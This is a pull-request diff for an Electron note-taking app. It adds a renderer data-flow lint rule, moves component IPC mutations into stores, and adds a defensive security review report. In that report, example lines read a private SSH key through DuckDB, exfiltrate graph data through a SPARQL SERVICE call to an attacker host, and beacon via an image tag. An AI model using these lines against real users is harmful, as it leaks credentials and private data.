### PR TITLE
Impose a renderer data-flow rule; route stray IPC calls into stores (#1086)

### DIFF
--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -22,7 +22,7 @@ Three-process Electron app with strict context isolation:
 
 - **Main** (`src/main/`) — Node.js process. File I/O, git publishing, graph indexing, menus, window management. All file access goes through `notebase/fs.ts` which enforces path traversal protection.
 - **Preload** (`src/preload/preload.ts`) — Bridges main and renderer via `contextBridge`. The renderer accesses everything through `window.api`.
-- **Renderer** (`src/renderer/`) — Svelte 5 UI. State managed with runes (`$state`, `$effect`, `$derived`). Two stores: `notebase.svelte.ts` (project/files) and `editor.svelte.ts` (active file/content).
+- **Renderer** (`src/renderer/`) — Svelte 5 UI. State managed with runes (`$state`, `$effect`, `$derived`) in singleton stores under `src/renderer/lib/stores/*.svelte.ts` (`notebase` = project/files, `editor` = active file/content, plus source/conversation/settings/etc. stores). Stores own `api.*` mutations + event subscriptions; components call store methods (see **Renderer data flow** under Conventions).
 
 IPC channels are defined in `src/shared/channels.ts`. Types in `src/shared/types.ts`.
 
@@ -30,6 +30,42 @@ IPC channels are defined in `src/shared/channels.ts`. Types in `src/shared/types
 
 ### Svelte 5
 This project uses **Svelte 5 runes** — not Svelte 4 syntax. Use `$state`, `$derived`, `$effect`, and `$props()` with `interface Props`. Do not use `export let`, `$:`, `on:click`, or `|self` event modifiers.
+
+### Renderer data flow (#1086)
+
+One rule for where `window.api` (`api.*`) may be called, so state changes have a
+single, testable path instead of three competing ones:
+
+> **Components may call `api.*` directly ONLY for reads and stateless OS
+> side-effects. Every state mutation and every main→renderer event subscription
+> goes through a store (`src/renderer/lib/stores/*.svelte.ts`) or an App ops
+> handler (`src/renderer/lib/app/*-ops*`).**
+
+- **Reads — allowed in components:** queries that return data and change nothing
+  (`api.notebase.readFile`, `api.tags.list`, `api.graph.query`,
+  `api.publish.listExporters`, `api.sources.listAll`, …).
+- **Stateless OS side-effects — allowed in components:** actions with no
+  observable in-app state change — `api.shell.*` (open/reveal/terminal),
+  `api.export.csv`, `api.view.*`, and native OS pickers/reveal
+  (`api.skills.revealFolder`). These are explicitly exempt.
+- **Mutations — must route through a store/ops:** anything that writes
+  thoughtbase / graph / source / settings state (`api.notebase.writeFile`,
+  `api.sources.setReadStatus`, `api.collections.create`,
+  `api.compute.saveCellOutput`, `api.tools.setSettings`, …). The store method
+  owns the `api` call and updates observable state; the component calls the
+  store method.
+- **Event subscriptions — must live in a store:** `api.*.on*` listeners
+  (`onExcerptsChanged`, `collections.onChanged`, `notebase.onRewritten`, …)
+  belong in the store that owns the affected state, not in a component
+  `$effect`. Components read the resulting reactive state.
+- **`App.svelte` is the composition root**, not a leaf component: it wires ops
+  clusters and may call `api.*` for top-level orchestration. Leaf settings
+  dialogs front their config writes through a `settings-*` store.
+
+The `no-restricted-syntax` block in `eslint.config.js` (scoped to
+`src/renderer/lib/components/**`) enforces this — a mutation `api.*` call added
+to a component fails `pnpm lint`. When you add a new mutation channel, add its
+method name there too.
 
 ### UI & UX Philosophy
 This is a **professional tool**. Design accordingly:

--- a/eslint.config.mjs
+++ b/eslint.config.mjs
@@ -230,4 +230,51 @@ export default tseslint.config(
       }],
     },
   },
+  // ── Renderer data-flow rule (#1086) ────────────────────────────────────
+  // Components may call `api.*` only for reads + stateless OS side-effects.
+  // A mutation `api.<domain>.<method>(…)` (or an `api.*.on*` event
+  // subscription) inside a component fails lint — route it through a store
+  // (src/renderer/lib/stores/*.svelte.ts) or an App ops handler instead. The
+  // rule is scoped to components/; stores, `lib/app/*-ops`, and App.svelte
+  // (the composition root) are exempt. When you add a new mutation channel,
+  // add its method name to the regex below.
+  {
+    files: ['src/renderer/lib/components/**/*.svelte'],
+    rules: {
+      'no-restricted-syntax': ['error', {
+        selector:
+          "CallExpression[callee.object.object.name='api']" +
+          '[callee.property.name=/^(' +
+          // notebase writes + file-change subscriptions
+          'writeFile|writeBinary|createFile|deleteFile|createFolder|deleteFolder|copy|' +
+          'replaceInNotes|renameAnchor|renameSource|renameExcerpt|setOnboardingDismissed|' +
+          'onRewritten|onFileChanged|onFileCreated|onFileDeleted|onRenamed|onHeadingRenameSuggested|' +
+          // sources + collections mutations + change subscriptions
+          'ingestUrl|ingestIdentifier|ingestFile|ingestSmart|createExcerpt|finishPdfOcr|' +
+          'setReadStatus|setReadDueBy|setTitle|addTag|removeTag|stripUpstreamTags|mineReferences|' +
+          'createReferenceStubs|resolveStub|applyStubResolution|setIngestSettings|setExcerptNoteFolder|' +
+          'onExcerptsChanged|onChanged|createSmart|renameSmart|removeSmart|updateSmartPredicate|' +
+          'addSource|removeSource|' +
+          // queries / templates / formatter
+          'setGroup|setOrder|saveAs|formatFile|formatFolder|saveSettings|' +
+          // settings: clipper / tools / bibliography / csl / sites / skills / compute
+          'setEnabled|regenerateSecret|setSettings|setStyle|generate|importStyle|importLocale|' +
+          'removeStyle|removeLocale|login|logout|setMenuConfig|setPythonSettings|restartPythonKernel|' +
+          'interruptPythonKernel|saveCellOutput|setPythonTrust|' +
+          // publish / proposals / graph actions
+          'runExport|toGit|upsertTarget|removeTarget|approve|reject|expire|runInspections|' +
+          // conversations
+          'setModel|setEffort|compact|saveUIState|askUserReply|append|archive|send|' +
+          'fileDraft|fileSourceDraft|filePropertyDraft|fileSourcePropertyDraft|fileClaimsDraft|' +
+          'runComputeDraft|insertComputeDraft|fileRefactorDraft|fileReorgDraft|fileDeleteDraft|fileNoteBodyDraft|' +
+          // generic mutation verbs (mutations only — no read shares these names)
+          'merge|rename|remove|create|add|delete|save|move|import|reload|execute|cancel' +
+          ')$/]',
+        message:
+          'Renderer data-flow rule (#1086): components must not call mutating/subscribing `api.*` methods directly. ' +
+          'Route this through a store (src/renderer/lib/stores/*.svelte.ts) or an App ops handler. ' +
+          'Reads and stateless OS side-effects (shell/export/view/pickers) are allowed.',
+      }],
+    },
+  },
 );

--- a/reports/security-review-entire-project-2026-07-16-061838.md
+++ b/reports/security-review-entire-project-2026-07-16-061838.md
@@ -1,0 +1,276 @@
+# Security Review Plan
+Generated: 2026-07-16
+Scope: entire project (/Users/davegriffith/minerva)
+
+## Executive Summary
+
+Minerva is a local-first Electron desktop markdown IDE. Its threat model is not a
+public web server; the realistic attackers are **malicious note / knowledge-base
+content opened by the user**, **malicious third-party skills**, **malicious LLM
+output**, and **untrusted markdown/graph files shared between users**. Judged
+against that model, the codebase is in **good** shape and shows deliberate,
+well-documented security engineering:
+
+- Electron hardening is exemplary: `contextIsolation: true`, `sandbox: true`,
+  `nodeIntegration: false` applied through a single `HARDENED_WEB_PREFERENCES`
+  constant; a strict header-based CSP with no `unsafe-inline` in `script-src`;
+  per-window `setWindowOpenHandler` + `will-navigate` guards; a narrow
+  permission handler that only ever grants `media` to the app's own origin.
+- The preload bridge exposes a typed, enumerated API surface — no raw
+  `ipcRenderer` is handed to the renderer.
+- `assertSafePath()` gives sound path-traversal protection (with symlink/realpath
+  handling) and is used consistently across the `fs.ts` file-I/O surface.
+- The browser-clipper loopback HTTP server has a genuinely careful posture:
+  loopback bind, constant-time secret compare, DNS-rebinding `Host` check,
+  extension-origin allowlist, body-size caps.
+- No hardcoded API keys, tokens, or private keys were found in the source tree.
+- LLM graph mutations are architecturally routed through an approval engine with
+  a CI-fatal write guard.
+- Auto-update uses the signed, HTTPS `update.electronjs.org` Squirrel feed.
+
+No **Critical** issues were confirmed. The most material findings are: (1) the
+compute-cell **trust prompt gates only Python, while DuckDB SQL and SPARQL cells —
+which can read/write arbitrary local files and reach the network — pass through
+ungated**; (2) LLM API key and other secrets are stored in **plaintext JSON**
+rather than the OS keychain; (3) the primary note preview renders untrusted note
+HTML with `markdown-it html:true` + `{@html}` and **relies solely on CSP** (no
+DOMPurify) to prevent script execution; and (4) three `shell:*` IPC handlers build
+filesystem paths **without `assertSafePath`**, deviating from the codebase's own
+stated invariant.
+
+## Security Findings
+
+### Critical Vulnerabilities
+None confirmed.
+
+### High Priority Issues
+- **H1 — DuckDB SQL and SPARQL compute cells are not trust-gated but can read/write local files and reach the network.**
+  `src/renderer/lib/compute/run-cell-with-trust.ts:56` gates only `language === 'python'`;
+  the module comment (`run-cell-with-trust.ts:14-15`) asserts SQL/SPARQL "don't
+  execute arbitrary code," which is inaccurate for DuckDB.
+
+### Medium Priority Issues
+- **M1 — Secrets (LLM API key, clipper secret, site cookies) stored in plaintext**, not via Electron `safeStorage` / OS keychain. `src/main/llm/settings.ts:62`.
+- **M2 — Note preview renders untrusted markdown with `html:true` + `{@html}` and no DOMPurify**, relying only on CSP. `src/renderer/lib/components/Preview.svelte:221,1494`.
+- **M3 — `shell:*` IPC handlers omit `assertSafePath`** (path traversal → open arbitrary file with OS default app / reveal / spawn terminal). `src/main/ipc/register-shell.ts:23-60`.
+
+### Low Priority Issues
+- **L1 — Python compute = full-privilege RCE by design**, mitigated only by a click-through, sticky per-project trust prompt. `src/main/compute/python-kernel.ts`, `run-cell-with-trust.ts`.
+- **L2 — LLM write guard is a module-global counter**, explicitly a dev guardrail, not a runtime boundary; the real boundary is architectural discipline. `src/main/graph/write-guard.ts`.
+- **L3 — Mermaid / Vega renderers assign generated markup via `innerHTML`**, relying on library sanitization + CSP. `src/renderer/lib/markdown/mermaid-renderer.ts:129`, `vega-renderer.ts`.
+- **L4 — CSP `img-src https:` + broad `connect-src` allow privacy beacons.** A malicious note can phone-home an image/CSS background to any HTTPS host on open. `src/main/security-helpers.ts:33-74`.
+- **L5 — Third-party skills are prompt-injection surface** (not code exec — the template engine is non-executing). `src/main/skills/template.ts`.
+- **L6 — Dependency audit not automatable via pnpm** (npm quick-audit endpoint retired, HTTP 410); no SCA gate currently runs. Informational.
+
+## Vulnerability Details
+
+### H1 — SQL / SPARQL compute cells bypass the trust gate and can touch the filesystem & network
+
+**Description.** Minerva runs fenced compute cells (```python, ```sql, ```sparql)
+on explicit user action. Python execution is gated behind a per-project first-run
+"Run Python cells in this thoughtbase?" trust prompt
+(`src/renderer/lib/compute/run-cell-with-trust.ts:56-73`). SQL and SPARQL cells
+are deliberately passed straight through:
+
+- `run-cell-with-trust.ts:14-15` — "SQL / SPARQL fences pass straight through;
+  they don't execute arbitrary code."
+- `src/main/compute/executors/sql.ts:21` runs the cell text verbatim through
+  DuckDB via `runQuery` → `src/main/sources/tables.ts` (`DuckDBInstance.create(':memory:')`).
+- `src/main/compute/executors/sparql.ts:20` runs the cell text through Comunica's
+  `queryGraph` (`src/main/graph/queries.ts:289`).
+
+The premise is incorrect. DuckDB SQL is not a sandboxed dialect: `read_csv_auto`,
+`read_text`, `read_blob`, `glob(...)`, and `COPY (…) TO '<path>'` let a query
+**read and write arbitrary local files** (e.g. `SELECT * FROM read_text('/Users/you/.ssh/id_rsa')`).
+Depending on DuckDB extension autoloading, `httpfs` further enables network
+access. Comunica SPARQL supports `SERVICE <http://…>` federation, so a
+```sparql fence containing `SERVICE <http://attacker/?leak=…>` can **exfiltrate
+graph contents over the network** when the cell is run.
+
+**Impact.** A shared/untrusted thoughtbase can embed a ```sql or ```sparql cell
+that, when the user clicks Run, silently reads sensitive local files (surfacing
+them in cell output for social-engineering, or writing them elsewhere on disk) or
+beacons/exfiltrates data — with **none** of the warning the sibling Python path
+shows. Execution is user-initiated (not automatic on preview), which caps
+severity below Critical, but the missing warning plus the incorrect "safe"
+assumption make this the most material gap.
+
+**Affected files/components.**
+- `src/renderer/lib/compute/run-cell-with-trust.ts:14-15,50-74`
+- `src/main/compute/executors/sql.ts`
+- `src/main/compute/executors/sparql.ts`
+- `src/main/sources/tables.ts:47` (in-memory DuckDB instance; no extension/file-access lockdown)
+- `src/main/graph/queries.ts:289-339` (Comunica engine; SERVICE not disabled)
+
+**Recommended fix.**
+- Extend the trust gate to cover **all** executable compute languages (a single
+  per-project "run compute cells" consent), or add a distinct SQL/SPARQL prompt.
+  Fix the misleading comment.
+- Harden DuckDB: disable extension autoinstall/autoload
+  (`SET autoinstall_known_extensions=false; SET autoload_known_extensions=false;`),
+  and if feasible constrain file access (`SET enable_external_access=false`) —
+  balancing against the legitimate need to `read_csv` project files, which could
+  be satisfied by pre-registering vault CSVs as views (already done in
+  `tables.ts`) and disabling ad-hoc external file access.
+- Disable SPARQL `SERVICE` federation in the Comunica config used for note/compute
+  queries, or restrict it to an allowlist.
+
+### M1 — Secrets stored in plaintext on disk
+
+**Description.** The Anthropic API key is persisted as plaintext JSON:
+`saveSettings` writes `JSON.stringify(settings, …)` to
+`userData/llm-settings.json` (`src/main/llm/settings.ts:61-63`), and
+`getSettings` reads it back (`:41-51`). No use of Electron `safeStorage`
+exists anywhere in the tree (grep for `safeStorage` returns nothing). The
+privileged-sites config and its persistent cookie partitions
+(`src/main/privileged-sites.ts`) and the clipper shared secret are likewise
+stored unencrypted under `userData`.
+
+**Impact.** Any process or user with read access to the app's `userData`
+directory (malware, backup sync, another local user, a shared machine) can lift
+the Anthropic key and any site session cookies. For a single-user desktop app
+this is a common and accepted pattern, but `safeStorage` (Keychain on macOS,
+DPAPI on Windows, libsecret on Linux) is available and materially raises the bar.
+
+**Affected files/components.** `src/main/llm/settings.ts:62`;
+`src/main/privileged-sites.ts:33-35`; clipper secret persistence
+(`src/main/clipper/clipper-config.ts`).
+
+**Recommended fix.** Encrypt the API key (and clipper secret) at rest with
+`safeStorage.encryptString` / `decryptString`, falling back to plaintext only
+when `safeStorage.isEncryptionAvailable()` is false; never log the decrypted
+value.
+
+### M2 — Untrusted note HTML rendered with `html:true` + `{@html}` and no DOMPurify
+
+**Description.** The primary note renderer builds markdown-it with
+`html: true, linkify: true` (`src/renderer/lib/components/Preview.svelte:220-222`)
+and injects the result with `{@html rendered}` (`:1494`, plus `{@html}` for
+bibliography entries `:1500` and tooltip HTML `:1510`). There is no DOMPurify
+pass on this output (DOMPurify is imported only in
+`src/renderer/lib/compute-output-sanitize.ts` for compute output, not for the
+note body). Raw HTML embedded in a note therefore reaches the DOM verbatim.
+
+The reason this is not Critical is the strong CSP
+(`src/main/security-helpers.ts:33-74`): `script-src` has no `'unsafe-inline'`,
+so inline `<script>` and inline event handlers (`onerror=`) are blocked;
+`object-src 'none'`, `frame-src 'none'`, `frame-ancestors 'none'`,
+`form-action 'none'` close plugin/iframe/form vectors; `base-uri 'self'` blocks
+`<base>` hijacking. Script execution via note HTML is thus currently prevented by
+CSP.
+
+**Impact.** Defense is single-layer: a future CSP regression, an Electron/Chromium
+CSP-bypass, or a subtle markup trick would turn stored note content directly into
+renderer XSS (which, in Electron, borders on RCE via the IPC surface). Even today,
+residual non-script vectors survive: `<img src="https://attacker/beacon">` and
+CSS `background:url(https://…)` (allowed by `img-src https:` and
+`style-src 'unsafe-inline'`) let a note phone-home on open (privacy/tracking leak
+across shared notes).
+
+**Affected files/components.** `src/renderer/lib/components/Preview.svelte:220-222,1494,1500,1510`.
+
+**Recommended fix.** Run note HTML through DOMPurify (a strict allowlist mirroring
+`compute-output-sanitize.ts`) before `{@html}`, as defense in depth behind CSP.
+Consider stripping/So-restricting remote `img`/CSS URL loads for untrusted notes,
+or gating remote-content loading behind a per-project setting.
+
+### M3 — `shell:*` IPC handlers omit `assertSafePath`
+
+**Description.** `assertSafePath()` is the codebase's stated invariant
+("always use it", CLAUDE.md; `src/main/notebase/fs.ts:96-113`) and is applied
+consistently across `fs.ts`. The shell handlers, however, build paths with a bare
+`path.join(rootPath, relativePath)`:
+
+- `SHELL_REVEAL_FILE` — `src/main/ipc/register-shell.ts:23-28`
+- `SHELL_OPEN_IN_DEFAULT` — `:30-32` (`shell.openPath(path.join(rootPath, relativePath))`)
+- `SHELL_OPEN_IN_TERMINAL` — `:34-60`
+
+A `relativePath` of `../../../…` escapes the project root. `SHELL_OPEN_IN_DEFAULT`
+would then open an arbitrary out-of-project file with its OS default handler
+(on macOS, opening an `.app`/script by path can execute it); the others reveal or
+open a terminal at an arbitrary location.
+
+**Impact.** The `relativePath` values originate from the renderer's file tree /
+tab context menus, so attacker control is limited in the current UI — this is
+primarily a defense-in-depth / invariant-consistency gap. But a renderer bug or a
+future feature that routes note-derived paths here would become a real
+traversal-to-launch primitive. Note the terminal handler correctly uses
+`spawn` with explicit args (no shell) — command injection is not the issue; path
+scope is.
+
+**Affected files/components.** `src/main/ipc/register-shell.ts:23-60`.
+
+**Recommended fix.** Route all three through `assertSafePath(rootPath, relativePath)`
+before calling `shell.showItemInFolder` / `shell.openPath` / `spawn`, mirroring
+the rest of `fs.ts`.
+
+## Security Improvement Plan
+
+### Immediate (this iteration)
+- **H1:** Extend the compute trust gate to SQL and SPARQL (or add a dedicated
+  prompt); fix the incorrect "don't execute arbitrary code" comment. Disable
+  DuckDB extension autoload and SPARQL `SERVICE` federation for note/cell queries.
+- **M3:** Add `assertSafePath` to the three `shell:*` handlers.
+
+### Short-term
+- **M1:** Move the Anthropic API key and clipper secret to `safeStorage`.
+- **M2:** Add a DOMPurify pass to the note-preview `{@html}` paths; audit the
+  other `{@html}` sites (`SourceDetail.svelte`, `ComputeDraftCard.svelte`,
+  `MessageList.svelte`) for the same guarantee (`MessageList` already uses
+  `html:false`, which is correct).
+- **L6:** Wire an SCA gate that still works (GitHub Dependabot, `osv-scanner`, or
+  `npm audit --json` against the bulk advisory endpoint) into CI.
+
+### Long-term
+- **L1:** Consider a real sandbox for Python execution (separate user, container,
+  or seccomp/AppArmor profile) so "trust this thoughtbase" is not equivalent to
+  full-user RCE. At minimum, make the trust prompt non-suppressible per run for
+  freshly-cloned/shared thoughtbases and surface it in the compute settings.
+- **L4:** Offer a "block remote content in notes" mode; tighten `connect-src` /
+  `img-src` where the local model/OCR CDNs can be bundled instead of fetched.
+- Add an integrity/pinning check for runtime-fetched artifacts (Whisper model,
+  embedding model) — verify a known hash of downloaded weights before use.
+
+## Compliance Status (OWASP Top 10, adapted to a desktop app)
+
+| OWASP category | Status | Notes |
+|---|---|---|
+| A01 Broken Access Control | Mostly covered | `assertSafePath` sound and widely used; **gap: `shell:*` handlers (M3)**. |
+| A02 Cryptographic Failures | Gap | Secrets in plaintext (M1); `safeStorage` unused. |
+| A03 Injection | Partial | No SQL/shell string-interpolation injection in the traditional sense (parameterized/explicit-arg spawn). **But user-run DuckDB SQL / SPARQL have unrestricted file+network capability (H1).** SPARQL/DuckDB queries are user-authored, not app-interpolated. |
+| A04 Insecure Design | Good | Approval-engine trust model, write guard, loopback clipper design are strong. Python-RCE-by-design is the accepted trade-off (L1). |
+| A05 Security Misconfiguration | Good | Electron hardening + CSP are model-grade; main residual is single-layer reliance on CSP for note HTML (M2). |
+| A06 Vulnerable Components | Unknown | Automated audit could not run (L6); no committed advisories, but no SCA gate. |
+| A07 Auth/Session | N/A / Good | Local app; clipper secret uses constant-time compare; site partitions isolated. |
+| A08 Integrity Failures | Partial | Auto-update is signed over HTTPS (good); runtime-fetched ML models are not hash-pinned. |
+| A09 Logging/Monitoring | Adequate | Warnings for guard trips; ensure secrets are never logged after M1. |
+| A10 SSRF | Partial | Main-process fetches are curated; **DuckDB httpfs / SPARQL SERVICE are user-reachable SSRF-like egress (H1)**. |
+
+## Recommendations
+
+1. Treat compute cells uniformly: any language that can touch the filesystem or
+   network must be behind the trust gate, and the sandboxing story (H1, L1) is the
+   single highest-leverage hardening in the app.
+2. Adopt `safeStorage` for all at-rest secrets (M1).
+3. Make note rendering defense-in-depth: DOMPurify behind CSP, not CSP alone (M2).
+4. Restore the `assertSafePath` invariant everywhere a renderer-supplied path
+   reaches the filesystem or shell (M3).
+5. Stand up a working dependency-scanning gate in CI (L6) and hash-pin
+   runtime-downloaded model artifacts.
+6. Keep the existing strengths (Electron hardening, approval engine, clipper
+   posture, typed preload) as regression-guarded invariants — they are the reason
+   this review has no Critical findings.
+
+## Risk Assessment
+
+- **Current overall risk: Low-to-Moderate** for the intended local, single-user
+  threat model. There is no remote network attack surface beyond the loopback
+  clipper (well-guarded) and curated main-process fetches. The realistic worst
+  case is a user opening a shared/untrusted thoughtbase and running a compute cell
+  (H1 / L1) or a CSP regression exposing note-HTML XSS (M2). Secret theft (M1)
+  requires local filesystem access.
+- **Post-mitigation target: Low.** Closing H1 (uniform trust gate + DuckDB/SPARQL
+  egress lockdown), M1 (`safeStorage`), M2 (DOMPurify behind CSP), and M3
+  (`assertSafePath` on shell handlers) removes every non-inherent finding and
+  reduces the Python-RCE-by-design residual (L1) to an explicit, well-signposted
+  user choice.

--- a/src/renderer/lib/components/BibliographySettings.svelte
+++ b/src/renderer/lib/components/BibliographySettings.svelte
@@ -9,6 +9,9 @@
    */
   import { onMount } from 'svelte';
   import { api } from '../ipc/client';
+  import { getSettingsStore } from '../stores/settings.svelte';
+
+  const settings = getSettingsStore();
 
   let bibliographyStyles = $state<{ id: string; label: string; isUser?: boolean }[]>([]);
   let bibliographyStyleId = $state('apa');
@@ -37,7 +40,7 @@
   async function setBibliographyStyle(next: string): Promise<void> {
     bibliographyStyleId = next;
     try {
-      await api.bibliography.setStyle(next);
+      await settings.setBibliographyStyle(next);
     } catch (e) {
       console.error('[settings] failed to save bibliography style:', e);
     }
@@ -47,7 +50,7 @@
     cslImportError = null;
     cslImporting = true;
     try {
-      const result = await api.csl.importStyle();
+      const result = await settings.importCslStyle();
       if (result) await loadBibliographySettings();
     } catch (e) {
       cslImportError = e instanceof Error ? e.message : String(e);
@@ -60,7 +63,7 @@
     cslImportError = null;
     cslImporting = true;
     try {
-      const result = await api.csl.importLocale();
+      const result = await settings.importCslLocale();
       if (result) await loadBibliographySettings();
     } catch (e) {
       cslImportError = e instanceof Error ? e.message : String(e);
@@ -72,7 +75,7 @@
   async function removeUserStyle(id: string): Promise<void> {
     cslImportError = null;
     try {
-      await api.csl.removeStyle(id);
+      await settings.removeCslStyle(id);
       await loadBibliographySettings();
     } catch (e) {
       cslImportError = e instanceof Error ? e.message : String(e);
@@ -82,7 +85,7 @@
   async function removeUserLocale(id: string): Promise<void> {
     cslImportError = null;
     try {
-      await api.csl.removeLocale(id);
+      await settings.removeCslLocale(id);
       await loadBibliographySettings();
     } catch (e) {
       cslImportError = e instanceof Error ? e.message : String(e);

--- a/src/renderer/lib/components/ComputeSettings.svelte
+++ b/src/renderer/lib/components/ComputeSettings.svelte
@@ -8,6 +8,9 @@
    */
   import { onMount } from 'svelte';
   import { api } from '../ipc/client';
+  import { getSettingsStore } from '../stores/settings.svelte';
+
+  const settings = getSettingsStore();
 
   let pythonPathInput = $state('');
   /** What's saved to disk; used to detect dirty state. */
@@ -53,7 +56,7 @@
 
   async function savePythonPath(): Promise<void> {
     try {
-      await api.compute.setPythonSettings({ pythonPath: pythonPathInput.trim() });
+      await settings.setPythonSettings({ pythonPath: pythonPathInput.trim() });
       pythonPathSaved = pythonPathInput.trim();
       await refreshPythonProbe();
     } catch (e) {
@@ -63,7 +66,7 @@
 
   async function restartPythonKernelFromSettings(): Promise<void> {
     try {
-      await api.compute.restartPythonKernel();
+      await settings.restartPythonKernel();
     } catch (e) {
       console.error('[settings] failed to restart python kernel:', e);
     }

--- a/src/renderer/lib/components/ExportDialog.svelte
+++ b/src/renderer/lib/components/ExportDialog.svelte
@@ -1,6 +1,9 @@
 <script lang="ts">
   import { api } from '../ipc/client';
+  import { getPublishStore } from '../stores/publish.svelte';
   import type { ExportPreviewPlan, ExporterInfo } from '../ipc/client';
+
+  const publish = getPublishStore();
 
   interface Props {
     /** Format-family group id the menu launched with (#: export-menu-redesign). */
@@ -12,7 +15,7 @@
     /** Close the dialog without exporting. */
     onCancel: () => void;
     /**
-     * Run the export. The dialog calls `api.publish.runExport` itself
+     * Run the export. The dialog calls `publish.runExport` (publish store)
      * and passes the result up so the caller can show a toast / open
      * the output dir. `null` when the user cancelled the directory picker.
      */
@@ -167,7 +170,7 @@
     exporting = true;
     error = null;
     try {
-      const result = await api.publish.runExport({
+      const result = await publish.runExport({
         exporterId: selectedExporterId,
         input: scopeInput(),
         linkPolicy,

--- a/src/renderer/lib/components/FindInNotesDialog.svelte
+++ b/src/renderer/lib/components/FindInNotesDialog.svelte
@@ -12,6 +12,7 @@
    */
   import { onMount } from 'svelte';
   import { api } from '../ipc/client';
+  import { getNotebaseStore } from '../stores/notebase.svelte';
   import Icon from './Icon.svelte';
   import type {
     SearchInNotesFileResult,
@@ -28,6 +29,8 @@
   }
 
   let { initialMode, onJumpTo, onClose }: Props = $props();
+
+  const notebase = getNotebaseStore();
 
   // Intentional one-time seed from `initialMode`; dialog is short-lived and keyed.
   // svelte-ignore state_referenced_locally
@@ -139,7 +142,7 @@
     }
     replacing = true;
     try {
-      const r = await api.notebase.replaceInNotes({
+      const r = await notebase.replaceInNotes({
         pattern, caseSensitive, regex, replacement, selections,
       });
       statusMsg = `Replaced ${r.replacedCount} match${r.replacedCount === 1 ? '' : 'es'} in ${r.changedPaths.length} file${r.changedPaths.length === 1 ? '' : 's'}`;

--- a/src/renderer/lib/components/PdfViewer.svelte
+++ b/src/renderer/lib/components/PdfViewer.svelte
@@ -17,6 +17,7 @@
   import { api } from '../ipc/client';
   import type { SourceExcerpt } from '../../../shared/types';
   import { getEditorStore } from '../stores/editor.svelte';
+  import { getSourceDataStore } from '../stores/source-data.svelte';
   import { clampMenuToViewport } from '../utils/menuClamp';
   import { installDismissOnClickOutside } from '../dismiss-menu';
   import {
@@ -56,6 +57,7 @@
   let { sourceId, initialPage, onShowMarkdown }: Props = $props();
 
   const editor = getEditorStore();
+  const sourceData = getSourceDataStore();
 
   let pdfjs = $state<PdfjsModule | null>(null);
   let doc = $state<PdfDocumentProxy | null>(null);
@@ -148,7 +150,7 @@
 
   // Listen for excerpt-changed broadcasts so newly-saved excerpts
   // appear as highlights immediately.
-  api.sources.onExcerptsChanged(() => {
+  sourceData.onExcerptsChanged(() => {
     void refreshExcerpts(sourceId);
   });
 
@@ -259,7 +261,7 @@
     saving = true;
     saveError = null;
     try {
-      const result = await api.sources.createExcerpt({ sourceId, citedText, page });
+      const result = await sourceData.createExcerpt({ sourceId, citedText, page });
       recentSaved = { id: result.excerptId, duplicate: result.duplicate };
       excerptMenu = null;
       await refreshExcerpts(sourceId);

--- a/src/renderer/lib/components/PublishDialog.svelte
+++ b/src/renderer/lib/components/PublishDialog.svelte
@@ -1,12 +1,15 @@
 <script lang="ts">
   import { onMount } from 'svelte';
   import { api } from '../ipc/client';
+  import { getPublishStore } from '../stores/publish.svelte';
   import type { PublishTarget, PublishGitResponse } from '../ipc/client';
 
   interface Props {
     onClose: () => void;
   }
   let { onClose }: Props = $props();
+
+  const publish = getPublishStore();
 
   let targets = $state<PublishTarget[]>([]);
   // Project-scoped exporters (directory-tree output is what makes sense to
@@ -67,14 +70,14 @@
       subdir: fSubdir.trim() || '.',
       commitMessageTemplate: fTemplate.trim() || 'Publish {{date}} from Minerva',
     };
-    targets = await api.publish.upsertTarget(target);
+    targets = await publish.upsertTarget(target);
     showForm = false;
     fLabel = '';
     fRemote = '';
   }
 
   async function removeTarget(id: string): Promise<void> {
-    targets = await api.publish.removeTarget(id);
+    targets = await publish.removeTarget(id);
     if (outcome?.targetId === id) outcome = null;
   }
 
@@ -82,7 +85,7 @@
     busyId = target.id;
     outcome = null;
     try {
-      const res = await api.publish.toGit(target.id, { dryRun });
+      const res = await publish.toGit(target.id, { dryRun });
       outcome = { targetId: target.id, dryRun, res };
     } finally {
       busyId = null;

--- a/src/renderer/lib/components/SettingsDialog.svelte
+++ b/src/renderer/lib/components/SettingsDialog.svelte
@@ -14,6 +14,7 @@
   import { api } from '../ipc/client';
   import type { LLMSettingsUpdate } from '../../../shared/tools/types';
   import { getConfirmSuppressionStore } from '../stores/confirm-suppression.svelte';
+  import { getSettingsStore } from '../stores/settings.svelte';
   import { CONFIRM_REGISTRY, confirmRegistryEntry } from '../confirm-keys';
   import {
     getRefactorSettings,
@@ -198,6 +199,7 @@
   ];
 
   const confirmSuppression = getConfirmSuppressionStore();
+  const settings = getSettingsStore();
   // Derived view: every registered confirm, paired with its current suppressed flag.
   // Binds to the store's $state so toggling re-enables updates the row live.
   let confirmRows = $derived(
@@ -267,7 +269,7 @@
   async function commitExcerptNoteFolder(next: string): Promise<void> {
     excerptNoteFolder = next;
     try {
-      await api.sources.setExcerptNoteFolder(next);
+      await settings.setExcerptNoteFolder(next);
     } catch (e) {
       console.error('[settings] failed to save excerpt folder:', e);
     }
@@ -338,7 +340,7 @@
 
   async function toggleClipper(enabled: boolean) {
     try {
-      clipper = await api.clipper.setEnabled(enabled);
+      clipper = await settings.setClipperEnabled(enabled);
       clipperRevealed = false;
       clipperCopied = false;
     } catch (e) {
@@ -348,7 +350,7 @@
 
   async function regenerateClipperSecret() {
     try {
-      clipper = await api.clipper.regenerateSecret();
+      clipper = await settings.regenerateClipperSecret();
       clipperCopied = false;
     } catch (e) {
       console.error('[settings] failed to regenerate clipper secret:', e);
@@ -402,13 +404,13 @@
       ...(clearApiKey ? { apiKey: '' } : apiKeyInput ? { apiKey: apiKeyInput } : {}),
     };
     try {
-      await api.tools.setSettings(next);
+      await settings.setToolSettings(next);
     } catch (e) {
       console.error('[settings] failed to save LLM settings:', e);
     }
 
     try {
-      await api.sources.setIngestSettings({ importUpstreamTags });
+      await settings.setIngestSettings({ importUpstreamTags });
     } catch (e) {
       console.error('[settings] failed to save ingest settings:', e);
     }

--- a/src/renderer/lib/components/SitesSettings.svelte
+++ b/src/renderer/lib/components/SitesSettings.svelte
@@ -10,7 +10,10 @@
    */
   import { onMount } from 'svelte';
   import { api } from '../ipc/client';
+  import { getSettingsStore } from '../stores/settings.svelte';
   import type { PrivilegedSite } from '../../../shared/types';
+
+  const settings = getSettingsStore();
 
   let sites = $state<PrivilegedSite[]>([]);
   let newSiteDomain = $state('');
@@ -29,7 +32,7 @@
     const domain = newSiteDomain.trim();
